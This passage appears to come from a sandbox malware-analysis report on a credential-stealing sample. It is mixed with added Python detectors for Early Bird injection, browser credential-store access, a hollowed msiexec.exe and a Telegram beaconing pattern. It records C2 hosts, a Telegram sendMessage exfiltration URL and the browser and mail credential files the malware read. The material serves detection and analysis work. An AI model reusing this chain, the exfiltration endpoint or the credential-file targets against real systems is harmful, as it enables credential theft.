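    staging file's text, and the whole file is passed to that command as its argument."""
    text = staging_bytes.decode("utf-8", errors="replace")
    return text[offset:offset + length]

# Constructed stand-in for Ainaleh.Sie (the report does not include the file): 8795 filler
# characters, then 'iex' at the offset the launcher slices. The real content is an assumption.
STAGING_SAMPLE = b"#" * 8795 + b"iex" + b"\n# remainder of the obfuscated script\n"

@dataclass
class ApiEvent:
    pid: int          # calling process
    api: str          # CreateProcess, WriteProcessMemory, QueueUserAPC, ResumeThread
    target_pid: int   # process acted on
    suspended: bool = False   # CreateProcess with CREATE_SUSPENDED

def detect_early_bird(events):
    """Return (parent, child) pairs where the parent created the child suspended, wrote into
    it and queued an APC *before* the first ResumeThread. An APC queued after the resume is
    ordinary APC injection, not Early Bird, and is not flagged."""
    stages = {}
    hits = []
    for ev in events:
        key = (ev.pid, ev.target_pid)
        if ev.api == "CreateProcess" and ev.suspended:
            stages[key] = set()
        elif key in stages and "resumed" not in stages[key]:
            if ev.api == "WriteProcessMemory":
                stages[key].add("write")
            elif ev.api == "QueueUserAPC":
                stages[key].add("apc")
            elif ev.api == "ResumeThread":
                if {"write", "apc"} <= stages[key]:
                    hits.append(key)
                stages[key].add("resumed")
    return hits

# Constructed from the report's chain. powershell.exe PID 4242 is assumed (the report does
# not state it); msiexec.exe PID 3488 and the written base 0x4260000 are from the report.
EARLY_BIRD_EVENTS = [
    ApiEvent(4242, "CreateProcess", 3488, suspended=True),
    ApiEvent(4242, "WriteProcessMemory", 3488),   # base 0x4260000 in the report
    ApiEvent(4242, "QueueUserAPC", 3488),
    ApiEvent(4242, "ResumeThread", 3488),
]
LATE_APC_EVENTS = [   # same calls, but the APC lands after the resume: not Early Bird
    ApiEvent(4242, "CreateProcess", 5000, suspended=True),
    ApiEvent(4242, "WriteProcessMemory", 5000),
    ApiEvent(4242, "ResumeThread", 5000),
    ApiEvent(4242, "QueueUserAPC", 5000),
]

if __name__ == "__main__":
    path, off, ln = parse_launcher(SAMPLE_CMDLINE)
    print(f"staging file: {path}")
    print(f"invoked command: {resolve_invoked_command(STAGING_SAMPLE, off, ln)!r}")
    print("early bird:", detect_early_bird(EARLY_BIRD_EVENTS), detect_early_bird(LATE_APC_EVENTS))
```

The ordering check in `detect_early_bird` is the whole point of the signature: the same four API calls in a different order (resume first, APC later) are a weaker indicator, so a detector that only counts the calls per parent/child pair would over-report. The regex is deliberately tied to this launcher shape; a real deployment would add the other `SubString`/`Invoke-Expression` variants seen in the wild as separate patterns rather than loosening this one.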

            Stealing of Sensitive Information

            Source: Yara match, file source: 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: Process Memory Space: msiexec.exe PID: 3488, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\msiexec.exe, file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Windows\SysWOW64\msiexec.exe, file opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Windows\SysWOW64\msiexec.exe, file opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\msiexec.exe, file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\msiexec.exe, file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\msiexec.exe, file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\msiexec.exe, file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
            Source: C:\Windows\SysWOW64\msiexec.exe, file opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\msiexec.exe, file opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: Yara match, file source: Process Memory Space: msiexec.exe PID: 3488, type: MEMORYSTR
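The file opens listed above are the observable side of the "Tries to harvest and steal browser information" and "Tries to steal Mail credentials" signatures: a Windows Installer process has no reason to read Chrome or Edge `Login Data`, `Cookies`, `History`, `Web Data` or `Top Sites`, nor a Postbox mail profile. The following is an added example, not Joe Sandbox or sample code, showing the ownership check a file-access detector would apply. The nine msiexec.exe records are the report's own paths; the chrome.exe and `MSI1234.tmp` records, and the process-to-profile ownership table, are constructed for the example.

```python
"""Flag processes that open browser credential/history stores or mail-client profiles they
do not own, the access pattern this section records for msiexec.exe. Added example; not
Joe Sandbox or sample code. The file-open records are constructed from the report's paths."""
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Chromium profile files holding saved logins, cookies, autofill and history
SENSITIVE_NAMES = {"login data", "cookies", "web data", "history", "top sites"}
# Mail-client profile roots (lower-case path fragments); PostboxApp is the one the report shows
MAIL_PROFILE_ROOTS = ("\\appdata\\roaming\\postboxapp\\profiles",)
# Image name -> fragment of the profile path that image legitimately owns (assumed table)
BROWSER_OWNERS = {"chrome.exe": "\\google\\chrome\\", "msedge.exe": "\\microsoft\\edge\\"}

@dataclass(frozen=True)
class FileOpen:
    image: str   # image name of the process performing the open
    path: str    # path that was opened

def classify(path):
    """'browser-store', 'mail-profile', or None for a path that is not of interest."""
    p = PureWindowsPath(path)
    low = str(p).lower()
    if p.name.lower() in SENSITIVE_NAMES and "\\user data\\" in low:
        return "browser-store"
    if any(root in low for root in MAIL_PROFILE_ROOTS):
        return "mail-profile"
    return None

def suspicious_opens(opens):
    """Return (image, category, path) for each open of a sensitive store by a process that
    does not own it. A browser reading its own profile is expected; cross-browser reads and
    any other image (msiexec.exe here) are reported."""
    hits = []
    for o in opens:
        cat = classify(o.path)
        if cat is None:
            continue
        own = BROWSER_OWNERS.get(o.image.lower())
        if cat == "browser-store" and own and own in o.path.lower():
            continue
        hits.append((o.image, cat, o.path))
    return hits

U = r"C:\Users\user\AppData"
SAMPLE_OPENS = [
    # the nine opens the report attributes to C:\Windows\SysWOW64\msiexec.exe
    FileOpen("msiexec.exe", U + r"\Local\Google\Chrome\User Data\Default\History"),
    FileOpen("msiexec.exe", U + r"\Local\Microsoft\Edge\User Data\Default\History"),
    FileOpen("msiexec.exe", U + r"\Local\Microsoft\Edge\User Data\Default\Login Data"),
    FileOpen("msiexec.exe", U + r"\Local\Google\Chrome\User Data\Default\Web Data"),
    FileOpen("msiexec.exe", U + r"\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    FileOpen("msiexec.exe", U + r"\Local\Google\Chrome\User Data\Default\Login Data"),
    FileOpen("msiexec.exe", U + r"\Local\Google\Chrome\User Data\Default\Top Sites"),
    FileOpen("msiexec.exe", U + r"\Local\Microsoft\Edge\User Data\Default\Network\Cookies"),
    FileOpen("msiexec.exe", U + r"\Roaming\PostboxApp\Profiles"),
    # constructed controls: a browser on its own store (benign) and on another's (flagged)
    FileOpen("chrome.exe", U + r"\Local\Google\Chrome\User Data\Default\Login Data"),
    FileOpen("chrome.exe", U + r"\Local\Microsoft\Edge\User Data\Default\Login Data"),
    FileOpen("msiexec.exe", U + r"\Local\Temp\MSI1234.tmp"),   # ordinary installer file, ignored
]

if __name__ == "__main__":
    for image, cat, path in suspicious_opens(SAMPLE_OPENS):
        print(f"{image:12} {cat:14} {path}")
```

Matching on the file name plus the `\User Data\` segment rather than on a full path keeps the rule valid for non-default profiles (`Profile 1`, `Profile 2`) and for portable installs; the ownership table is where a deployment would add backup agents or password managers that legitimately read these files.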

            Remote Access Functionality

            Source: Yara match, file source: 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: Process Memory Space: msiexec.exe PID: 3488, type: MEMORYSTR
            MITRE ATT&CK Matrix (per tactic; a number before a technique is the count marker shown in the report's matrix, kept as displayed)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
            Execution: 1 Windows Management Instrumentation; 1 Native API; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers
            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Privilege Escalation: 1 DLL Side-Loading; 311 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Defense Evasion: 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 11 Masquerading; 51 Virtualization/Sandbox Evasion; 311 Process Injection; Compile After Delivery
            Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
            Discovery: 3 File and Directory Discovery; 24 System Information Discovery; 121 Security Software Discovery; 1 Process Discovery; 51 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
            Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture
            Command and Control: 1 Web Service; 3 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
            Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 1631823, Sample: uPDwUy9ewY.exe, Start date: 07/03/2025, Architecture: WINDOWS, Score: 100. The graph rendering was flattened by extraction; its nodes are reconstructed below (the counters after a process name are the registry-value/file counts from the legend, given as they appear in the graph).

Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for dropped file; 8 other signatures
Contacted domains: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 4 other IPs or domains

Process tree:
uPDwUy9ewY.exe (counters: 1, 29)
    dropped: C:\Users\user\AppData\Local\...\nsExec.dll, PE32
    powershell.exe (counters: 30)
        dropped: C:\Users\user\AppData\...\uPDwUy9ewY.exe, PE32
        dropped: C:\Users\...\uPDwUy9ewY.exe:Zone.Identifier, ASCII
        signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 3 other signatures
        msiexec.exe (counters: 15, 8)
            network: checkip.dyndns.com 132.226.247.73, ports as listed 49692, 49695, 49697, UTMEMUS, United States; api.telegram.org 149.154.167.220, ports as listed 443, 49709, TELEGRAMRU, United Kingdom; 3 other IPs or domains
            signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
        conhost.exe
svchost.exe (counters: 1, 1)
    network: 127.0.0.1 unknown unknown
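The chain in the graph above (installer in a user directory, then powershell.exe, then a bare msiexec.exe that is the process actually opening the C2 connections) is what a hunt query should key on. The following is an added example written for this page, not Joe Sandbox's code: it runs that logic over a small set of constructed process-create and network-connect events. The event schema (Event ID 1 with pid/ppid/image/cmd, Event ID 3 with pid/host/ip/port), the paths and the process IDs are assumptions modelled on the report's behavior graph, not real telemetry.

```python
"""Hunt for a script host launching a package-less msiexec.exe that then talks to the
network, the hollowing pattern seen in this report.  Added example, not Joe Sandbox's
code; events below are constructed to mirror the report's process tree."""
from collections import defaultdict

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# msiexec switches that mean a genuine package operation was requested.
PACKAGE_FLAGS = {"/i", "/x", "/a", "/j", "/f", "/p", "/package", "/uninstall",
                 "/update", "/regserver", "/unregserver"}

PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"   # assumed path
MSI = r"C:\Windows\SysWOW64\msiexec.exe"                            # assumed path
SAMPLE = r"C:\Users\user\Desktop\uPDwUy9ewY.exe"                     # assumed path

# Constructed Sysmon-style events (not real telemetry): id 1 = process create, id 3 = connect.
EVENTS = [
    {"id": 1, "pid": 100, "ppid": 50, "image": SAMPLE, "cmd": SAMPLE},
    {"id": 1, "pid": 200, "ppid": 100, "image": PS, "cmd": "powershell.exe -WindowStyle Hidden"},
    {"id": 1, "pid": 300, "ppid": 200, "image": MSI, "cmd": MSI},
    {"id": 1, "pid": 301, "ppid": 200, "image": r"C:\Windows\System32\conhost.exe", "cmd": "conhost.exe"},
    {"id": 3, "pid": 300, "host": "checkip.dyndns.com", "ip": "132.226.247.73", "port": 80},
    {"id": 3, "pid": 300, "host": "api.telegram.org", "ip": "149.154.167.220", "port": 443},
    # Benign controls: a real package install from the shell, and one driven by PowerShell.
    {"id": 1, "pid": 400, "ppid": 50, "image": MSI, "cmd": 'msiexec.exe /i "C:\\Temp\\tool.msi" /qn'},
    {"id": 1, "pid": 500, "ppid": 200, "image": MSI, "cmd": 'msiexec.exe /i "C:\\Temp\\tool.msi"'},
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def bare_msiexec(cmd):
    """True when msiexec was started without any package operation switch or .msi
    argument, which is how a hollowing loader starts its host process."""
    tokens = [t.strip('"').lower() for t in cmd.split()]
    tokens = ["/" + t[1:] if t.startswith("-") else t for t in tokens]
    if any(t.endswith(".msi") for t in tokens):
        return False
    return not any(t in PACKAGE_FLAGS for t in tokens)


def lineage(procs, pid):
    """Walk ppid links upwards and return the full image paths, child first."""
    images, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        images.append(procs[pid]["image"])
        pid = procs[pid]["ppid"]
    return images


def find_hollowed_msiexec(events):
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    conns = defaultdict(list)
    for e in events:
        if e["id"] == 3:
            conns[e["pid"]].append(e["host"])
    findings = []
    for pid, e in procs.items():
        if basename(e["image"]) != "msiexec.exe" or not bare_msiexec(e["cmd"]):
            continue
        parent = procs.get(e["ppid"])
        if parent is None or basename(parent["image"]) not in SCRIPT_HOSTS:
            continue
        images = lineage(procs, pid)
        findings.append({
            "pid": pid,
            "chain": [basename(p) for p in images],
            # Any ancestor under C:\Users\ is the dropper candidate.
            "from_user_path": any(p.lower().startswith("c:\\users\\") for p in images),
            "hosts": conns.get(pid, []),
            # A bare msiexec that also opens network connections is the hollowed payload.
            "severity": "high" if conns.get(pid) else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in find_hollowed_msiexec(EVENTS):
        print(f)
```

The parent check is deliberately a small allow-list of script hosts rather than "anything that is not explorer.exe": msiexec.exe is legitimately spawned by services.exe, setup bootstrappers and software-deployment agents, and those would flood the query. The package-argument test is what separates the injection host from those cases, since a real install always carries a package switch or an .msi path.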

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
Antivirus detection, submitted sample (Source | Detection | Scanner | Label):
uPDwUy9ewY.exe | 72% | Virustotal |
uPDwUy9ewY.exe | 66% | ReversingLabs | Win32.Backdoor.njRAT
uPDwUy9ewY.exe | 100% | Avira | TR/Injector.bjagk

Antivirus detection, dropped files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exe | 100% | Avira | TR/Injector.bjagk
C:\Users\user\AppData\Local\Temp\nsd51C8.tmp\nsExec.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsd51C8.tmp\nsExec.dll | 0% | Virustotal |
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exe | 66% | ReversingLabs | Win32.Backdoor.njRAT
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exe | 72% | Virustotal |

No Antivirus matches (reported for each of the three remaining antivirus tables of the report)
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
drive.google.com | 142.250.184.238 | true | false | | high
drive.usercontent.google.com | 172.217.16.193 | true | false | | high
reallyfreegeoip.org | 104.21.80.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 132.226.247.73 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
http://checkip.dyndns.org/ | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2008/03/2025%20/%2017:53:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
URLs found in process memory and dumps (Name | Source). Every entry below is reported as Malicious: false, no Antivirus Detection, Reputation: high.
https://duckduckgo.com/ac/?q= | msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmp
https://api.telegram.org | msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmp
https://api.telegram.org/bot | msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmp
https://contoso.com/License | powershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp
https://chrome.google.com/webstore?hl=enlB/r | msiexec.exe, 00000005.00000002.2142843540.0000000021EDA000.00000004.00000800.00020000.00000000.sdmp
https://aka.ms/pscore6lB/r | powershell.exe, 00000002.00000002.1255613084.0000000004A81000.00000004.00000800.00020000.00000000.sdmp
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmp
https://chrome.google.com/webstore?hl=en | msiexec.exe, 00000005.00000002.2142843540.0000000021EDF000.00000004.00000800.00020000.00000000.sdmp
http://varders.kozow.com:8081 | msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp
https://www.google.com | msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp; msiexec.exe, 00000005.00000003.1353014568.00000000062A7000.00000004.00000020.00020000.00000000.sdmp; msiexec.exe, 00000005.00000003.1353093478.00000000062A7000.00000004.00000020.00020000.00000000.sdmp
https://www.google.com/images/branding/product/ico/googleg_alldp.ico | msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmp
https://drive.google.com/ | msiexec.exe, 00000005.00000002.2129804635.000000000621A000.00000004.00000020.00020000.00000000.sdmp
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmp
https://contoso.com/ | powershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp
https://www.office.com/lB/r | msiexec.exe, 00000005.00000002.2142843540.0000000021F0B000.00000004.00000800.00020000.00000000.sdmp
https://apis.google.com | msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp; msiexec.exe, 00000005.00000003.1353014568.00000000062A7000.00000004.00000020.00020000.00000000.sdmp; msiexec.exe, 00000005.00000003.1353093478.00000000062A7000.00000004.00000020.00020000.00000000.sdmp
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1255613084.0000000004A81000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp
https://reallyfreegeoip.org/xml/ | msiexec.exe, 00000005.00000002.2142843540.0000000021D9C000.00000004.00000800.00020000.00000000.sdmp
https://www.office.com/ | msiexec.exe, 00000005.00000002.2142843540.0000000021F10000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000005.00000002.2142843540.0000000021F01000.00000004.00000800.00020000.00000000.sdmp
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20a | msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmp
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmp
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmp
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmp
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmp
https://contoso.com/Icon | powershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmp
http://crl.ver) | svchost.exe, 00000004.00000002.2128766647.00000233FD600000.00000004.00000020.00020000.00000000.sdmp
https://ac.ecosia.org?q= | msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmp
https://drive.usercontent.google.com/ | msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp
https://g.live.com/odclientsettings/ProdV2/C: | svchost.exe, 00000004.00000003.1203467438.00000233FD4A0000.00000004.00000800.00020000.00000000.sdmp; qmgr.db.4.dr; edb.log.4.dr
http://checkip.dyndns.org | msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp
https://chrome.google.com/webstore?hl=en4 | msiexec.exe, 00000005.00000002.2142843540.0000000021EDF000.00000004.00000800.00020000.00000000.sdmp
http://nsis.sf.net/NSIS_ErrorError | uPDwUy9ewY.exe; uPDwUy9ewY.exe.2.dr
https://api.telegram.org/bot/sendMessage?chat_id=&text= | msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmp
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmp
http://aborters.duckdns.org:8081 | msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp
https://g.live.com/odclientsettings/Prod/C: | edb.log.4.dr
https://www.ecosia.org/newtab/v20w | msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmp
http://nsis.sf.net/NSIS_Error | uPDwUy9ewY.exe; uPDwUy9ewY.exe.2.dr
https://www.office.com/4 | msiexec.exe, 00000005.00000002.2142843540.0000000021F10000.00000004.00000800.00020000.00000000.sdmp
https://ion=v4.5 | powershell.exe, 00000002.00000002.1254568952.0000000000A98000.00000004.00000020.00020000.00000000.sdmp
http://anotherarmy.dns.army:8081 | msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp
https://duckduckgo.com/chrome_newtabv20 | msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmp
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmp
https://drive.usercontent.google.com/F | msiexec.exe, 00000005.00000002.2129804635.00000000062A1000.00000004.00000020.00020000.00000000.sdmp; msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp
https://reallyfreegeoip.org/xml/8.46.123.189$ | msiexec.exe, 00000005.00000002.2142843540.0000000021E23000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000005.00000002.2142843540.0000000021E0B000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000005.00000002.2142843540.0000000021DC6000.00000004.00000800.00020000.00000000.sdmp
https://reallyfreegeoip.org | msiexec.exe, 00000005.00000002.2142843540.0000000021E23000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000005.00000002.2142843540.0000000021D9C000.00000004.00000800.00020000.00000000.sdmp
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmp
https://gemini.google.com/app?q= | msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmp
Contacted public IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
142.250.184.238 | drive.google.com | United States | 15169 | GOOGLEUS | false
172.217.16.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
104.21.80.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false

Other IPs:
127.0.0.1 (loopback; contacted by svchost.exe in the behavior graph)
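The network indicators above describe a fixed sequence: the payload resolves its public IP through checkip.dyndns.org, looks up the country through reallyfreegeoip.org/xml/<ip>, then sends a "PC Name:" report through the Telegram Bot API sendMessage endpoint. The following is an added example written for this page, not part of the Joe Sandbox report: it runs that sequence logic over constructed web-proxy log lines and correlates the lookups with the Telegram beacon per client. The log line format ("<ISO timestamp> <client IP> <method> <URL> <status>"), the client addresses, and the bot token and chat_id values are assumptions, not real proxy output or real C2 parameters.

```python
"""Correlate victim fingerprinting (public IP + geo lookup) with a Telegram Bot API
sendMessage beacon, the Snake Keylogger pattern documented in this report.
Added example, not Joe Sandbox's code; the log below is constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

FINGERPRINT_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com", "reallyfreegeoip.org"}
TELEGRAM_SEND = re.compile(r"^/bot[^/]*/sendMessage$", re.IGNORECASE)
# Fragments carried by the beacon text in the report's sendMessage URL.
BEACON_MARKERS = ("PC Name:", "Clicked on the File")
WINDOW = timedelta(minutes=10)   # lookup-to-beacon gap that still counts as one run

# Constructed log lines; bot token "0000:PLACEHOLDER" and chat_id 0 are placeholders.
LOG = """\
2025-03-08T17:53:40Z 10.0.0.5 GET http://checkip.dyndns.org/ 200
2025-03-08T17:53:42Z 10.0.0.5 GET https://reallyfreegeoip.org/xml/8.46.123.189 200
2025-03-08T17:53:59Z 10.0.0.5 GET https://api.telegram.org/bot0000:PLACEHOLDER/sendMessage?chat_id=0&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20%5D 200
2025-03-08T18:10:00Z 10.0.0.9 GET https://api.telegram.org/bot0000:PLACEHOLDER/getUpdates 200
2025-03-08T18:11:00Z 10.0.0.12 GET http://checkip.dyndns.org/ 200
"""


def parse_line(line):
    ts, client, method, url, status = line.split()
    u = urlsplit(url)
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "client": client,
            "method": method, "host": (u.hostname or "").lower(),
            "path": u.path, "query": u.query, "status": int(status)}


def classify(rec):
    """'fingerprint', 'beacon', 'telegram' (other Bot API traffic) or None."""
    if rec["host"] in FINGERPRINT_HOSTS:
        return "fingerprint"
    if rec["host"] == "api.telegram.org":
        if TELEGRAM_SEND.match(rec["path"]):
            # parse_qs percent-decodes, so the CRLF-separated report text is readable here.
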